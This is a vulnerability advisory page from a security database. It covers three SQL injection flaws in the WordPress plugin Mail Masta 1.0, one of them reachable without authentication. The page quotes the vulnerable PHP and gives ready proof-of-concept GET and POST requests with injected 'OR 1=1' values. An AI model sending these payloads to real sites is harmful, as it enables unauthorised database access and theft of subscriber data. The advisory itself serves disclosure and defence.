Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugAnonymousSSV:92735
HistoryMar 06, 2017 - 12:00 a.m.

WordPress Plugin Mail Masta 1.0 - SQL Injection

2017-03-0600:00:00
Anonymous
www.seebug.org
44

0.006 Low

EPSS

Percentile

78.5%

JSON

Vulnerability information

Vulnerability title: WordPress Plugin Mail Masta 1.0 - SQL Injection

Plugin home page: https://wpcore.com/plugin/mail-masta

Vulnerability type: SQL injection

CVE : [CVE-2017-6095, CVE-2017-6096, CVE-2017-6097, CVE-2017-6098]

Vulnerability analysis

The first injection

Vulnerability exist address: no authentication

./ wp-content/plugins/mail-masta/inc/lists/csvexport.php

Vulnerability exists parameters: list_id

http://my_wp_app/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php

ๆˆ‘ไปฌๅ…ˆๆฅ็œ‹ไธ‹csvexport.php:

$list_id=$_GET['list_id'];
global $wpdb;
$mail_subscribers = $wpdb->prefix . "masta_subscribers";
$masta_list = $wpdb->prefix . "masta_list";
$check_sql = "SELECT * FROM $mail_subscribers WHERE list_id = $list_id";
$check_list="SELECT * FROM $masta_list WHERE list_id= $list_id";
$wp_list=$wpdb->get_results($check_sql);
$wp_list_s=$wpdb->get_results($check_list);

Without any filtering it into the SQL statement resulting in a vulnerability.

The second injection

Vulnerability exist address: the need for the Wordpress administrator

./ wp-content/plugins/mail-masta/inc/lists/view-list.php

Vulnerability exists parameters: filter_list

http://my_wp_app/wp-admin/admin.php?page=masta-lists&action=view_list&filter_list=0+OR+1%3D1

ๆˆ‘ไปฌ็œ‹ไธ‹view-list.php:

global $wpdb;
$list_id = $_GET['filter_list'];
$masta_list = $wpdb->prefix . "masta_list";
$masta_subscribers = $wpdb->prefix . "masta_subscribers";
$listdata = $wpdb->get_results( $wpdb->prepare("SELECT * FROM $masta_list WHERE list_id= $list_id",$query));
$list_subscribers = $wpdb->get_var( $wpdb->prepare("SELECT COUNT( `list_id` ) FROM $masta_subscribers WHERE list_id= $list_id AND status=1",$query));

As without any filter.

The third injection

Vulnerability exist address: the need for the Wordpress administrator

This is a POST injection

Vulnerability exists parameters list_id

ๅ…ˆๆฅ็œ‹็œ‹campaign_save.php:

$list_id=$_POST['list_id'];
$check_list = $wpdb->get_var("SELECT count(id) FROM wp_masta_subscribers where list_id=$list_id");

Without any filter, POST injection

POST /wp-admin/admin-ajax. php? id= HTTP/1.1

...snip...

action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save. php&sender_selected_list_check=check&list_id=1+OR+1%3D1

Related

patchstack 1
zdt 1
exploitpack 1
packetstorm 1
exploitdb 1
wpexploit 1
wpvulndb 1
cve 4
cvelist 4
prion 4
nvd 4
patchstack
patchstack
WordPress plugin Mail Masta 1.0 - Multiple SQL Injection vulnerabilities
2017-02-18 00:00:00
zdt
zdt
WordPress Mail Masta 1.0 Plugin - SQL Injection Vulnerability
2017-02-24 00:00:00
exploitpack
exploitpack
WordPress Plugin Mail Masta 1.0 - SQL Injection
2017-02-18 00:00:00
packetstorm
packetstorm
WordPress Mail Masta 1.0 SQL Injection
2017-02-24 00:00:00
exploitdb
exploitdb
WordPress Plugin Mail Masta 1.0 - SQL Injection
2017-02-18 00:00:00
wpexploit
wpexploit
Mail Masta 1.0 - Multiple SQL Injection
2017-02-18 00:00:00
wpvulndb
wpvulndb
Mail Masta 1.0 - Multiple SQL Injection
2017-02-18 00:00:00
cve
cve
CVE-2017-6098
2017-02-21 07:59:00
CVE-2017-6097
2017-02-21 07:59:00
CVE-2017-6095
2017-02-21 07:59:00
cvelist
cvelist
CVE-2017-6098
2017-02-21 07:46:00
CVE-2017-6095
2017-02-21 07:46:00
CVE-2017-6097
2017-02-21 07:46:00
prion
prion
Sql injection
2017-02-21 07:59:00
Sql injection
2017-02-21 07:59:00
Sql injection
2017-02-21 07:59:00
nvd
nvd
CVE-2017-6095
2017-02-21 07:59:00
CVE-2017-6098
2017-02-21 07:59:00
CVE-2017-6097
2017-02-21 07:59:00

0.006 Low

EPSS

Percentile

78.5%

JSON
Related for SSV:92735
patchstack1zdt1exploitpack1packetstorm1exploitdb1wpexploit1wpvulndb1cve4cvelist4prion4nvd4